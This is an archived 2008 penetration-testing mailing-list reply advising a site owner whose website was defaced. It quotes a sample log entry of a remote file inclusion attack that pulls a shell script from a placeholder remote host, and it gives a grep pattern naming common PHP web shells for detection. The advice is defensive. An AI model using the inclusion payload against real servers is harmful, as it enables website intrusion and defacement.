Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Hacked by aLpTurkTegin, help patching this hole

From: yummy <animalstastegood () gmail com>
Date: Sun, 25 May 2008 20:03:49 -0400
What user ownership was the hacked files, the user account, or the webserver?

In my experience if it was the user account, then there was a weak
password and it was bruteforced. Check the ftp logs for file uploads
for that user account.

If it was owned by the webserver, then there is probably an
exploitable php code on the site and usually it is due to a remote
file inclusion.
Check the apache domlogs, you might get lucky and find something.
RFI  entries  often look sometihng like:

 69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc
.php?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt??
HTTP/1.1" 200 - "-"

In that above example, the php file "settings.inc.php" is vulnerable
and allows for the code in a  php file on a remote server
(example.remoteserver.com) to be included (cmd.txt). Many times the
remote file will be a phpshell.

Of course this is just an example, you'd have to find what is being
exploited by what the others have suggested...

Sorry, This is kinda long winded and pretty much what everyone else
said, but I  have to deal with annoying defacement of sites everyday.
People that do that really bug me, plus i'm bored right now. :)

One HUGE help would be to make sure you have mod_security installed
and a decent modsec ruleset. That will prevent alot of naughtyness
from happening.

I like to check also for perl procs running as the webserver id,
worldwritable directories, and phpshells located in user accounts.

find /home/useraccountname/public_html/ -type d -perm 777

will locate insecure directories.

The following oneliner will find many common phpshells:

find /home/*/public_html -type f -print0 | xargs -0 egrep
'(\/tmp\/cmdtemp|SnIpEr_SA|c99shell|r57shell|milw0rm)'

it may take quite a while to complete depending on how many files
there are on the server.

My money is on an outdated php CMS/forum like phpbb, etc.. like
everyone else mentioned...

On Tue, May 20, 2008 at 8:46 AM, Mifa <mifa () stangercorp com> wrote:


Our website was defaced by aLpTurkTegin.  We are running apache, php ect.  Does anyone know how this hacker is 
getting in and what I can do to prevent this?

Our main web directory had all but one file deleted and hackedIndex.php, a.asp(a 0 byte file) and trustscn_put_test2 
were placed into the main directory.  The fact that the webserver served hackedindex.php makes me think its a apache 
web server flaw.

Any comments, suggestions?
Thanks, -D

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes
in Securing Web Applications
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes 
in Securing Web Applications  
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: